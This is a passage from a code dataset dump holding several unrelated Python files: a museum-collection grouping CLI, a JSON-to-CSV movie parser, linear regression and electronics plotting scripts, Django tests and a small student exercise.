2, SENSOR_ARRAY['3D'], env_.CYRPRA, {'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DA3.add('CYRPRA (9-state)', tab_DA3_A)\n\n tab_DA3_CJ = gui_.FilterFrame(tab_DA3, 2, SENSOR_ARRAY['3D'], env_.CJ, {'dimension': 3, 'noise': 10, 'dt_millis': 40}, env_.UKF, {})\n tab_DA3.add('CJ (12-state)', tab_DA3_CJ)\n\n # ----------------------------\n\n tk.mainloop()\n","repo_name":"m6c7l/mouse-tracking","sub_path":"sources/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8344,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"12457888468","text":"import asyncio\nimport math\nfrom collections import Counter\n\nimport click\nimport inflection\nfrom numpy import array\nfrom scipy.spatial.distance import cosine\nfrom sqlalchemy import and_, func, 
or_\nfrom sqlalchemy.future import select\nfrom sqlalchemy.orm import selectinload\n\nfrom museum_map.cli.items import apply_aat, apply_nlp\nfrom museum_map.cli.util import ClickIndeterminate\nfrom museum_map.models import Group, Item, create_sessionmaker\n\n\nasync def generate_groups_impl(config):\n    \"\"\"Generate the basic groups.\"\"\"\n    async with create_sessionmaker(config)() as dbsession:\n        item_stmt = select(Item).filter(Item.group_id.is_(None))\n        count_stmt = select(func.count(Item.id)).filter(Item.group_id.is_(None))\n        count = await dbsession.execute(count_stmt)\n        result = await dbsession.execute(item_stmt)\n        categories = []\n        with click.progressbar(\n            result.scalars(), length=count.scalar_one(), label=\"Generating potential groups\"\n        ) as progress:\n            for item in progress:\n                for category in item.attributes[\"_categories\"]:\n                    categories.append(category.lower())\n        counts = [(cat, count) for cat, count in Counter(categories).most_common() if count >= 15]  # noqa: PLR2004\n        counts.sort(key=lambda c: c[1])\n        max_groups = len(counts)\n        with click.progressbar(length=max_groups, label=\"Generating groups\") as progress:\n            while counts:\n                category = counts[0][0]\n                group_stmt = select(Group).filter(Group.value == category)\n                result = await dbsession.execute(group_stmt)\n                group = result.scalars().first()\n                if group is None:\n                    group = Group(value=category, label=category[0].upper() + category[1:], split=\"basic\")\n                    dbsession.add(group)\n                result = await dbsession.execute(item_stmt)\n                for item in result.scalars():\n                    if category in item.attributes[\"_categories\"]:\n                        item.group = group\n                await dbsession.commit()\n                categories = []\n                result = await dbsession.execute(item_stmt)\n                for item in result.scalars():\n                    for category in item.attributes[\"_categories\"]:\n                        categories.append(category.lower())\n                old_counts = len(counts)\n                counts = [\n                    (cat, count) for cat, count in Counter(categories).most_common() if count >= 15  # noqa: PLR2004\n                ]\n                counts.sort(key=lambda c: c[1])\n                progress.update(old_counts - len(counts))\n        await dbsession.commit()\n\n\n@click.command()\n@click.pass_context\ndef generate_groups(ctx):\n    \"\"\"Generate the basic groups.\"\"\"\n    asyncio.run(generate_groups_impl(ctx.obj[\"config\"]))\n\n\ndef fill_vector(group):\n    \"\"\"Create a full vector from a sparse vector in the database.\"\"\"\n    vec = array([0 for _ in range(0, 300)], dtype=float)\n    for dim, value in group.attributes[\"lda_vector\"]:\n        vec[dim] = value\n    return vec\n\n\ndef split_by_similarity(dbsession, group):\n    \"\"\"Split the groups by similarity.\"\"\"\n    vectors = {}\n    sorted_items = []\n    current = group.items[0]\n    vectors[current.id] = fill_vector(current)\n    while len(sorted_items) < len(group.items):\n        next_item = None\n        next_sim = None\n        for item in group.items:\n            if item in sorted_items:\n                continue\n            if item.id not in vectors:\n                vectors[item.id] = fill_vector(item)\n            if not next_item or cosine(vectors[current.id], vectors[item.id]) > next_sim:\n                next_item = item\n                next_sim = cosine(vectors[current.id], vectors[item.id])\n        if next_item:\n            sorted_items.append(next_item)\n    limit = len(group.items) / math.ceil(len(group.items) / 100)\n    new_group = Group(value=group.value, label=group.label, parent=group, split=\"similar\")\n    dbsession.add(new_group)\n    count = 0\n    for item in sorted_items:\n        if count > limit:\n            new_group = Group(value=group.value, label=group.label, parent=group, split=\"similar\")\n            dbsession.add(new_group)\n            count = 0\n        item.group = new_group\n        count = count + 1\n\n\ndef 
split_by_attribute(dbsession, group, attr):\n \"\"\"Split the group by the values of a given attribute.\"\"\"\n values = []\n for item in group.items:\n if attr in item.attributes and item.attributes[attr]:\n values.extend(item.attributes[attr])\n categories = [\n (v, c) for v, c in Counter(values).most_common() if c < len(group.items) * 0.6666 and c >= 15 # noqa: PLR2004\n ]\n if categories:\n category_values = [v for v, _ in categories]\n has_values = 0\n for item in group.items:\n found = False\n for value in item.attributes[attr]:\n if value in category_values:\n found = True\n break\n if found:\n has_values = has_values + 1\n if has_values / len(group.items) > 0.9: # noqa: PLR2004\n categories.reverse()\n for category in categories:\n new_group = Group(\n value=category[0], label=f\"{group.label} - {category[0]}\", parent=group, split=\"attribute\"\n )\n dbsession.add(new_group)\n for item in list(group.items):\n if category[0] in item.attributes[attr]:\n item.group = new_group\n new_group = Group(value=group.label, label=group.label, parent=group, split=\"attribute\")\n dbsession.add(new_group)\n for item in list(group.items):\n item.group = new_group\n return True\n return False\n\n\ndef split_by_year(config, dbsession, group):\n \"\"\"Split the group by year.\"\"\"\n years = []\n decades = []\n centuries = []\n with_year = 0\n for item in group.items:\n if config[\"data\"][\"year_field\"] in item.attributes and item.attributes[config[\"data\"][\"year_field\"]]:\n years.append(item.attributes[config[\"data\"][\"year_field\"]])\n with_year = with_year + 1\n if with_year / len(group.items) > 0.95: # noqa: PLR2004\n common = [(int(v), c) for v, c in Counter(years).most_common()]\n start_year = min([c for c, _ in common])\n end_year = max([c for c, _ in common])\n if start_year != end_year:\n if (end_year - start_year) <= 100 and (end_year - start_year) > 10: # noqa: PLR2004\n start_decade = math.floor(start_year / 10)\n end_decade = math.floor(end_year / 10)\n decades = []\n for start_year in range(start_decade * 10, (end_decade + 1) * 10, 10):\n for item in list(group.items):\n if (\n config[\"data\"][\"year_field\"] in item.attributes\n and item.attributes[config[\"data\"][\"year_field\"]]\n ):\n if (\n start_year <= int(item.attributes[config[\"data\"][\"year_field\"]])\n and int(item.attributes[config[\"data\"][\"year_field\"]]) < start_year + 10\n ):\n if len(decades) == 0 or decades[-1][0][0] != start_year:\n decades.append([[start_year], 1])\n else:\n decades[-1][1] = decades[-1][1] + 1\n idx = 0\n while idx < len(decades) - 1:\n if decades[idx][1] + decades[idx + 1][1] < 100: # noqa: PLR2004\n decades[idx][0].extend(decades[idx + 1][0])\n decades[idx][1] = decades[idx][1] + decades[idx + 1][1]\n decades.pop(idx + 1)\n else:\n idx = idx + 1\n for years, _ in decades:\n new_group = None\n for item in list(group.items):\n if (\n config[\"data\"][\"year_field\"] in item.attributes\n and item.attributes[config[\"data\"][\"year_field\"]]\n ):\n if (\n years[0] <= int(item.attributes[config[\"data\"][\"year_field\"]])\n and int(item.attributes[config[\"data\"][\"year_field\"]]) < years[-1] + 10\n ):\n if new_group is None:\n if len(years) == 1:\n label = f\"{years[0]}s\"\n else:\n label = f\"{years[0]}s-{years[-1]}s\"\n new_group = Group(\n value=str(start_year),\n label=f\"{group.label} - {label}\",\n parent=group,\n split=\"time\",\n )\n dbsession.add(new_group)\n item.group = new_group\n if group.items:\n new_group = Group(value=group.label, label=group.label, parent=group, 
split=\"time\")\n dbsession.add(new_group)\n for item in list(group.items):\n item.group = new_group\n return True\n elif (end_year - start_year) > 100: # noqa: PLR2004\n start_century = math.floor(start_year / 100)\n end_century = math.floor(end_year / 100)\n centuries = []\n for start_year in range(start_century * 100, (end_century + 1) * 100, 100):\n for item in list(group.items):\n if (\n config[\"data\"][\"year_field\"] in item.attributes\n and item.attributes[config[\"data\"][\"year_field\"]]\n ):\n if (\n start_year <= int(item.attributes[config[\"data\"][\"year_field\"]])\n and int(item.attributes[config[\"data\"][\"year_field\"]]) < start_year + 100\n ):\n if len(centuries) == 0 or centuries[-1][0][0] != start_year:\n centuries.append([[start_year], 1])\n else:\n centuries[-1][1] = centuries[-1][1] + 1\n idx = 0\n while idx < len(centuries) - 1:\n if centuries[idx][1] + centuries[idx + 1][1] < 100: # noqa: PLR2004\n centuries[idx][0].extend(centuries[idx + 1][0])\n centuries[idx][1] = centuries[idx][1] + centuries[idx + 1][1]\n centuries.pop(idx + 1)\n else:\n idx = idx + 1\n for years, _ in centuries:\n new_group = None\n for item in list(group.items):\n if (\n config[\"data\"][\"year_field\"] in item.attributes\n and item.attributes[config[\"data\"][\"year_field\"]]\n ):\n if (\n years[0] <= int(item.attributes[config[\"data\"][\"year_field\"]])\n and int(item.attributes[config[\"data\"][\"year_field\"]]) < years[-1] + 100\n ):\n if new_group is None:\n if len(years) == 1:\n century = math.floor(years[0] / 100) + 1\n if century % 10 == 1 and century != 11: # noqa: PLR2004\n label = f\"{century}st\"\n elif century % 10 == 2 and century != 12: # noqa: PLR2004\n label = f\"{century}nd\"\n elif century % 10 == 3 and century != 13: # noqa: PLR2004\n label = f\"{century}rd\"\n else:\n label = f\"{century}th\"\n else:\n century = math.floor(years[0] / 100) + 1\n if century % 10 == 1 and century != 11: # noqa: PLR2004\n start_label = f\"{century}st\"\n elif century % 10 == 2 and century != 12: # noqa: PLR2004\n start_label = f\"{century}nd\"\n elif century % 10 == 3 and century != 13: # noqa: PLR2004\n start_label = f\"{century}rd\"\n else:\n start_label = f\"{century}th\"\n century = math.floor(years[-1] / 100) + 1\n if century % 10 == 1 and century != 11: # noqa: PLR2004\n end_label = f\"{century}st\"\n elif century % 10 == 2 and century != 12: # noqa: PLR2004\n end_label = f\"{century}nd\"\n elif century % 10 == 3 and century != 13: # noqa: PLR2004\n end_label = f\"{century}rd\"\n else:\n end_label = f\"{century}th\"\n label = f\"{start_label}-{end_label}\"\n new_group = Group(\n value=str(start_year),\n label=f\"{group.label} - {label} century\",\n parent=group,\n split=\"time\",\n )\n dbsession.add(new_group)\n item.group = new_group\n if group.items:\n new_group = Group(value=group.label, label=group.label, parent=group, split=\"time\")\n dbsession.add(new_group)\n for item in list(group.items):\n item.group = new_group\n return True\n return False\n\n\nasync def split_large_groups_impl(config):\n \"\"\"Split large groups into smaller ones.\"\"\"\n async with create_sessionmaker(config)() as dbsession:\n progress = ClickIndeterminate(\"Splitting large groups\")\n progress.start()\n splitting = True\n stmt = select(Group).options(selectinload(Group.items), selectinload(Group.children))\n while splitting:\n splitting = False\n result = await dbsession.execute(stmt)\n for group in result.scalars():\n if len(group.children) == 0:\n if len(group.items) > 120 and len(group.items) < 300: 
# noqa: PLR2004\n                        if split_by_year(config, dbsession, group):\n                            splitting = True\n                        else:\n                            split_by_similarity(dbsession, group)\n                            splitting = True\n                    elif len(group.items) >= 300:  # noqa: PLR2004\n                        if split_by_attribute(dbsession, group, \"concepts\"):\n                            splitting = True\n                        elif split_by_attribute(dbsession, group, \"subjects\"):\n                            splitting = True\n                        elif split_by_attribute(dbsession, group, \"materials\"):\n                            splitting = True\n                        elif split_by_attribute(dbsession, group, \"techniques\"):\n                            splitting = True\n                        elif split_by_year(config, dbsession, group):\n                            splitting = True\n                        else:\n                            split_by_similarity(dbsession, group)\n                            splitting = True\n            await dbsession.commit()\n        progress.stop()\n\n\n@click.command()\n@click.pass_context\ndef split_large_groups(ctx):\n    \"\"\"Split large groups into smaller ones.\"\"\"\n    asyncio.run(split_large_groups_impl(ctx.obj[\"config\"]))\n\n\nasync def merge_singular_plural_impl(config):\n    \"\"\"Merge singular and plural groups.\"\"\"\n    async with create_sessionmaker(config)() as dbsession:\n        progress = ClickIndeterminate(\"Merging singular and plural\")\n        progress.start()\n        modifying = True\n        while modifying:\n            modifying = False\n            stmt = select(Group)\n            result = await dbsession.execute(stmt)\n            for group in result.scalars():\n                stmt = (\n                    select(Group)\n                    .filter(and_(Group.value == inflection.singularize(group.value), Group.id != group.id))\n                    .options(selectinload(Group.items))\n                )\n                result = await dbsession.execute(stmt)\n                other = result.scalars().first()\n                if other:\n                    for item in list(other.items):\n                        item.group = group\n                        dbsession.add(item)\n                    await dbsession.delete(other)\n                    await dbsession.commit()\n                    modifying = True\n                    break\n        progress.stop()\n\n\n@click.command()\n@click.pass_context\ndef merge_singular_plural(ctx):\n    \"\"\"Merge singular and plural groups.\"\"\"\n    asyncio.run(merge_singular_plural_impl(ctx.obj[\"config\"]))\n\n\nasync def add_parent_groups_impl(config):\n    \"\"\"Add any required parent groups.\"\"\"\n    async with create_sessionmaker(config)() as dbsession:\n        stmt = select(Group).filter(Group.parent_id.is_(None)).options(selectinload(Group.parent))\n        result = await dbsession.execute(stmt)\n        stmt = select(func.count(Group.id)).filter(Group.parent_id.is_(None))\n        result_count = await dbsession.execute(stmt)\n        with click.progressbar(\n            result.scalars(), length=result_count.scalar_one(), label=\"Adding parent groups\"\n        ) as progress:\n            for group in progress:\n                if \"aat\" in config[\"data\"][\"hierarchy\"][\"expansions\"]:\n                    categories = apply_aat(group.value, merge=False)\n                    if categories:\n                        for category_list in categories:\n                            mapped = False\n                            for category in category_list:\n                                stmt = select(Group).filter(Group.value == category)\n                                result = await dbsession.execute(stmt)\n                                parent_group = result.scalars().first()\n                                if not parent_group:\n                                    parent_group = Group(\n                                        value=category, label=category[0].upper() + category[1:], split=\"parent\"\n                                    )\n                                    dbsession.add(group)\n                                group.parent = parent_group\n                                mapped = True\n                                group = parent_group  # noqa: PLW2901\n                                if group.parent_id:\n                                    break\n                            if mapped:\n                                break\n                else:\n                    mapped = False\n                    for category in apply_nlp(group.value):\n                        stmt = select(Group).filter(\n                            or_(Group.value == category, Group.value == inflection.pluralize(category))\n                        )\n                        result = await dbsession.execute(stmt)\n                        parent_group = result.scalars().first()\n                        if parent_group:\n                            group.parent = parent_group\n                            await dbsession.commit()\n                            mapped = True\n                            break\n                    if not mapped:\n                        if group.value not in [\"styles and periods\"]:\n                            for category in apply_nlp(group.value):\n                                
hierarchies = apply_aat(category, merge=False)\n groups = []\n for hierarchy in hierarchies:\n if group.value not in hierarchy:\n stmt = (\n select(Group)\n .filter(Group.value.in_(hierarchy))\n .options(selectinload(Group.items))\n )\n result = await dbsession.execute(stmt)\n for potential_group in result.scalars():\n depth = 0\n tmp = potential_group\n while tmp:\n depth = depth + 1\n tmp = tmp.parent\n groups.append((potential_group, depth, len(potential_group.items)))\n if groups:\n groups.sort(key=lambda g: (g[1], g[2]), reverse=True)\n group.parent = groups[0][0]\n break\n await dbsession.commit()\n\n\n@click.command()\n@click.pass_context\ndef add_parent_groups(ctx):\n \"\"\"Add any required parent groups.\"\"\"\n asyncio.run(add_parent_groups_impl(ctx.obj[\"config\"]))\n\n\nasync def prune_single_groups_impl(config):\n \"\"\"Remove groups that have a single child and no items.\"\"\"\n async with create_sessionmaker(config)() as dbsession:\n progress = ClickIndeterminate(\"Pruning single groups\")\n progress.start()\n pruning = True\n stmt = select(Group).options(selectinload(Group.children), selectinload(Group.items))\n while pruning:\n pruning = False\n result = await dbsession.execute(stmt)\n for group in result.scalars():\n if len(group.items) == 0 and len(group.children) == 1:\n group.children[0].parent = group.parent\n await dbsession.delete(group)\n await dbsession.commit()\n pruning = True\n break\n progress.stop()\n\n\n@click.command()\n@click.pass_context\ndef prune_single_groups(ctx):\n \"\"\"Remove groups that have a single child and no items.\"\"\"\n asyncio.run(prune_single_groups_impl(ctx.obj[\"config\"]))\n\n\nasync def move_inner_items_impl(config):\n \"\"\"Move items from non-leaf groups into extra leaf groups.\"\"\"\n async with create_sessionmaker(config)() as dbsession:\n progress = ClickIndeterminate(\"Moving inner items\")\n progress.start()\n moving = True\n stmt = select(Group).options(selectinload(Group.children), selectinload(Group.items))\n while moving:\n moving = False\n result = await dbsession.execute(stmt)\n for group in result.scalars():\n if len(group.items) > 0 and len(group.children) > 0:\n sub_group = Group(value=group.value, label=group.label, split=\"inner\")\n dbsession.add(sub_group)\n sub_group.parent = group\n for item in list(group.items):\n item.group = sub_group\n dbsession.add(item)\n await dbsession.commit()\n moving = True\n break\n await dbsession.commit()\n progress.stop()\n\n\n@click.command()\n@click.pass_context\ndef move_inner_items(ctx):\n \"\"\"Move items from non-leaf groups into extra leaf groups.\"\"\"\n asyncio.run(move_inner_items_impl(ctx.obj[\"config\"]))\n\n\nasync def pipeline_impl(config):\n \"\"\"Run the group processing pipeline.\"\"\"\n await generate_groups_impl(config)\n await merge_singular_plural_impl(config)\n await add_parent_groups_impl(config)\n await prune_single_groups_impl(config)\n await move_inner_items_impl(config)\n await split_large_groups_impl(config)\n\n\n@click.command()\n@click.pass_context\ndef pipeline(ctx):\n \"\"\"Run the group processing pipeline.\"\"\"\n asyncio.run(pipeline_impl(ctx.obj[\"config\"]))\n\n\n@click.group()\ndef groups():\n \"\"\"Group generation.\"\"\"\n 
pass\n\n\ngroups.add_command(generate_groups)\ngroups.add_command(split_large_groups)\ngroups.add_command(add_parent_groups)\ngroups.add_command(merge_singular_plural)\ngroups.add_command(prune_single_groups)\ngroups.add_command(move_inner_items)\ngroups.add_command(pipeline)\n","repo_name":"scmmmh/museum-map","sub_path":"museum_map/cli/groups.py","file_name":"groups.py","file_ext":"py","file_size_in_byte":25774,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37333058283","text":"'''\nAuthor: zhangzongyan\nDate: 2018-04-12\n'''\nimport threading\nimport time\n\ndef test():\n while True:\n print(\"hello world\")\n time.sleep(1)\n\nif __name__ == '__main__':\n t = threading.Thread(target=test, args = ())\n t.start() # as long as the newly created thread has not terminated, the main thread will not exit either\n print(\"main ending\")","repo_name":"zhangzongyan/python20180319","sub_path":"day16/e1.py","file_name":"e1.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38212771675","text":"import json\nimport pandas as pd\nimport glob\n# glob is a library that allows us to loop through all the files.\nimport os\n\nif not os.path.exists('parsed_files'):\n\tos.mkdir('parsed_files')\n\t# parsed_files is the folder that will hold the parsed files.\n\ndf = pd.DataFrame()\n# this is how we make a new, empty data frame. Note the capital letters in DataFrame.\n\nfor json_file_name in glob.glob('json_files/*.json'):\n# the first glob is the library name, and the second is the function.\n# * is the wild card: it means we want all files that end in .json.\n\tf = open(json_file_name, \"r\")\n\tjson_data = json.load(f)\n\n# df = df.append({'adult': json_data['adult'], 'backdrop_path': json_data['backdrop_path'], 'title': json_data['title']}, ignore_index=True)\n# append allows us to put things at the end of the data frame, so we can append the data from this movie into the dataframe.\n# this creates categories for 'adult' etc.\n# typing all of this is time consuming.\n
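# NOTE: DataFrame.append was deprecated in pandas 1.4 and removed in pandas 2.0; on\n# a newer pandas an equivalent pattern is to collect the dicts in a list inside the\n# loop and build the frame once at the end, e.g. df = pd.DataFrame(records).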
\n\tdf = df.append({\n\t\t\t'adult': json_data['adult'],\n\t\t\t'backdrop_path': json_data['backdrop_path'],\n\t\t\t'belongs_to_collection': json_data['belongs_to_collection'],\n\t\t\t'budget': json_data['budget'],\n\t\t\t'genres': json_data['genres'],\n\t\t\t'homepage': json_data['homepage'],\n\t\t\t'id': json_data['id'],\n\t\t\t'imdb_id': json_data['imdb_id'],\n\t\t\t'original_language': json_data['original_language'],\n\t\t\t'original_title': json_data['original_title'],\n\t\t\t'overview': json_data['overview'],\n\t\t\t'popularity': json_data['popularity'],\n\t\t\t'poster_path': json_data['poster_path'],\n\t\t\t'production_companies': json_data['production_companies'],\n\t\t\t'production_countries': json_data['production_countries'],\n\t\t\t'release_date': json_data['release_date'],\n\t\t\t'revenue': json_data['revenue'],\n\t\t\t'runtime': json_data['runtime'],\n\t\t\t'spoken_languages': json_data['spoken_languages'],\n\t\t\t'status': json_data['status'],\n\t\t\t'tagline': json_data['tagline'],\n\t\t\t'title': json_data['title'],\n\t\t\t'video': json_data['video'],\n\t\t\t'vote_average': json_data['vote_average'],\n\t\t\t'vote_count': json_data['vote_count']\n\t\t}, ignore_index=True)\n\nprint(df)\n\ndf.to_csv('parsed_files/tmdb_dataset.csv')","repo_name":"cbouts/tmdb_download","sub_path":"tmdb_parse.py","file_name":"tmdb_parse.py","file_ext":"py","file_size_in_byte":2094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7049775280","text":"from sklearn import datasets\nimport numpy as np\nfrom numpy import ndarray\nimport matplotlib.pyplot as plt\nfrom random import randint\nimport mpl_toolkits.mplot3d as plt3d\n\ndef linear_regression(x: ndarray, y: ndarray, theta: ndarray) -> None:\n \"\"\"Given a test set X with labels Y, return the linear regression for the data set\n with the minimum cost.\"\"\"\n print(cost_function(x, y, theta))\n gradient_descent(x, y, theta, 0.01, 10000)\n print(cost_function(x, y, theta))\n\ndef cost_function(x: ndarray, y: ndarray, theta: ndarray) -> float:\n return np.sum(np.square((np.matmul(x, theta)-y)))/(2*x.shape[0])\n\ndef gradient_descent(x: ndarray, y: ndarray, theta: ndarray, alpha: float, turns: int) -> None:\n while turns > 0:\n temp = np.zeros([x.shape[1], 1])\n for i in range(x.shape[1]):\n # the partial derivative w.r.t. theta[i] weights the residuals by the i-th feature column\n temp[i] = theta[i] - alpha*np.sum((np.matmul(x, theta)-y)*x[:, i])/(x.shape[0])\n # update all parameters together, after every gradient component has been computed\n for i in range(x.shape[1]):\n theta[i] = temp[i]\n\n turns -= 1\n\ndef plotData(x: ndarray, y: ndarray, theta: ndarray):\n plt.plot(x, y, 'bo', x, eval('x*%f+%f' % (theta[1], theta[0])))\n plt.show()\n\nif __name__ == \"__main__\":\n boston = datasets.load_boston()\n\n # 2-D data\n X = boston.data[:, 5:6]\n Y = boston.target\n\n plt.plot(X, Y, 'bo')\n plt.xlabel('Number of Rooms')\n plt.ylabel('Price ($1000s)')\n plt.show()\n\n theta = np.array([1.0, X[randint(0, X.shape[0] - 1), 0]])\n X = np.append(np.ones(X.shape), X, axis=1)\n\n linear_regression(X, Y, theta)\n\n plt.plot(X[:, 1], Y, 'bo')\n plt.xlabel('Number of Rooms')\n plt.ylabel('Price ($1000s)')\n plt.plot(X[:, 1], eval('X[:, 1]*%f+%f' % (theta[1], theta[0])))\n plt.show()\n\n #3-D data\n X = boston.data[:, 4:6]\n\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(X[:, 0], X[:, 1], Y)\n ax.set_xlabel('NO2 concentration (parts per 10 million)')\n ax.set_ylabel('Number of rooms')\n ax.set_zlabel('Price ($1000s)')\n\n plt.show()\n\n rand = randint(0, X.shape[0] - 1)\n theta = np.array([1, X[rand, 0], X[rand, 1]])\n X = np.append(np.ones(X.shape[0]).reshape([X.shape[0], 1]), X, axis=1)\n\n linear_regression(X, Y, theta)\n\n
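 # Optional cross-check: for ordinary least squares the optimum is also available\n # in closed form, e.g. theta_ls = np.linalg.lstsq(X, Y, rcond=None)[0]; gradient\n # descent should converge towards the same solution.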
\n fig = plt.figure()\n ax = fig.add_subplot(111, projection='3d')\n ax.scatter(X[:, 1], X[:, 2], Y)\n ax.set_xlabel('NO2 concentration (parts per 10 million)')\n ax.set_ylabel('Number of rooms')\n ax.set_zlabel('Price ($1000s)')\n\n theta_points = np.array((eval('%f + %f*X[:, 1] + %f*X[:, 2]' % (theta[0], theta[1], theta[2]))))\n #ax.scatter(X[:, 1], X[:, 2], theta_points)\n\n #r1 = randint(0, X.shape[0])\n #r2 = randint(0, X.shape[0])\n #r3 = randint(0, X.shape[0])\n\n #p1 = np.array([X[r1][1], X[r1][2], theta_points[r1]])\n #p2 = np.array([X[r2][1], X[r2][2], theta_points[r2]])\n #p3 = np.array([X[r3][1], X[r3][2], theta_points[r3]])\n\n #v1 = p2-p1\n #v2 = p3-p1\n\n #normal = np.cross(v1, v2)\n #d = -np.dot(normal, p1)\n #Z = (-normal[0]*X[:, 1]-normal[1]*X[:, 2]-d)/normal[2]\n\n ax.plot_trisurf(X[:, 1], X[:, 2], theta_points, color='orange')\n plt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"joshhan619/linear_regression_example","sub_path":"linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"758556674","text":"tab_a = [3, 3, 3, 9, 9, 9, 1, 1, 1, 7, 2, 2, 2, 4, 4, 4, 8, 8, 8, 5, 5, 5]\r\n\r\ntab_b = [8, 5, 5, 5, 9, 9, 9, 18, 18, 18, 3, 3, 3]\r\n\r\ntab_c = [5, 5, 5, 1, 1, 1, 0, 0, 0, 6, 6, 6, 3, 8, 8, 8]\r\n\r\ndef trouver_intrus(tab, g, d):\r\n '''\r\n Returns the value of the intruder located between indices g and d\r\n in the list tab, where:\r\n tab satisfies the conditions of the exercise,\r\n g and d are multiples of 3.\r\n '''\r\n if g == d:\r\n return ...\r\n\r\n else:\r\n nombre_de_triplets = (d - g)// ...\r\n indice = g + 3 * (nombre_de_triplets // 2)\r\n if ... 
:\r\n return ...\r\n else:\r\n return ...\r\n","repo_name":"glassus/terminale_nsi","sub_path":"docs/T6_6_Epreuve_pratique/data2023/scripts/23-NSI-23.py","file_name":"23-NSI-23.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"fr","doc_type":"code","stars":39,"dataset":"github-code","pt":"37"} +{"seq_id":"31860046251","text":"from django.test import TestCase\nfrom django.urls import reverse\nfrom django.shortcuts import resolve_url\nfrom .models import Reminder\n\n\nclass DeleteItemTest(TestCase):\n def test_delete_item(self):\n Reminder.objects.create(title=\"Test\", description=\"test\")\n url = \"/reminders/1/delete\"\n response = self.client.delete(f\"{url}\")\n print(response.content)\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response.content, b'{\"message\": \"Successfully deleted\"}')\n\n\nclass MathTest(TestCase):\n def test_addition_operation(self):\n url = reverse(\"math\")\n response = self.client.get(f\"{url}?operation=add&a=1&b=2\")\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"3\")\n\n def test_subtraction_operation(self):\n url = reverse(\"math\")\n response = self.client.get(f\"{url}?operation=sub&a=1&b=2\")\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"-1\")\n\n def test_multi_operation(self):\n url = reverse(\"math\")\n response = self.client.get(f\"{url}?operation=mul&a=3&b=2\")\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"6\")\n\n def test_div_operation1(self):\n url = reverse(\"math\")\n response = self.client.get(f\"{url}?operation=div&a=6&b=2\")\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, \"3\")\n\n def test_div_operation2(self):\n url = reverse(\"math\")\n response = self.client.get(f\"{url}?operation=div&a=6&b=0\")\n self.assertEqual(response.status_code, 500)\n self.assertEqual(response.content, b'{\"result\": \"ERROR!\"}')\n","repo_name":"peerhoffmanncode/Coding-DCI","sub_path":"Assigments/00_Assesment/database-basic-usage-coding-test-1-peerhoffmanncode/assignment/reminders/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40488299257","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\ndef calcParam(Ra,Rb,Rc,VoReg,Vcc):\n IoCC = 0.7*(Rb+Rc)/(Ra*Rc)\n IoMAX = (VoReg*Rb+0.7*(Rb+Rc))/(Ra*Rc) \n PdMIN = (Vcc*Rb+0.7*(Rb+Rc))**2/(4*Ra*Rb*Rc)\n return IoCC,IoMAX,PdMIN \n\ndef calcVo(Io,Ra,Rb,Rc):\n return ((Io*Ra-0.7)*((Rb+Rc)/Rb)-Io*Ra)\n\ndef graphRsweep(Ra,Rb,Rc,VoReg,Vcc):\n Iocc,IoMAX,P = calcParam(Ra,Rb,Rc,VoReg,Vcc)\n I = np.arange(Iocc,IoMAX,(IoMAX-Iocc)/100)\n I = np.append(I,IoMAX)\n V = []\n for i in range(0,len(I)):\n Vaux = calcVo(I[i],Ra,Rb,Rc)\n V.append(Vaux)\n Ireg = np.arange(0,IoMAX,(IoMAX)/100)\n Ireg = np.append(Ireg,IoMAX)\n Vreg = []\n for i in range(0,len(Ireg)):\n Vreg.append(VoReg)\n plt.plot(I,V,'b')\n plt.plot(Ireg,Vreg,'b')\n plt.plot([IoMAX], [VoReg], 'ro',label = \"Rmin: %0.2f ohms\" % (VoReg/IoMAX))\n plt.plot([0.7], [VoReg], 'g^',label = \"R: %0.2f ohms\" % (VoReg/0.7))\n IpMAX = Vcc*(Rb/(2*Ra*Rc))+0.35*((Rb+Rc)/(Ra*Rc))\n VpMAX = 0.5*(Vcc-0.7*((Rb+Rc)/Rb))\n plt.plot([IpMAX], [VpMAX], 'bs', label = \"RMaxPd: %0.2f ohms\" % (VpMAX/IpMAX))\n plt.legend()\n\ndef graphPdRl(Ri,Rf,Ra,Rb,Rc,Vcc,VoReg):\n IoCC, IoMAX, P = calcParam(Ra,Rb,Rc,VoReg,Vcc)\n Rload = np.arange(Ri,Rf,(Rf-Ri)/100)\n Po = []\n for i in 
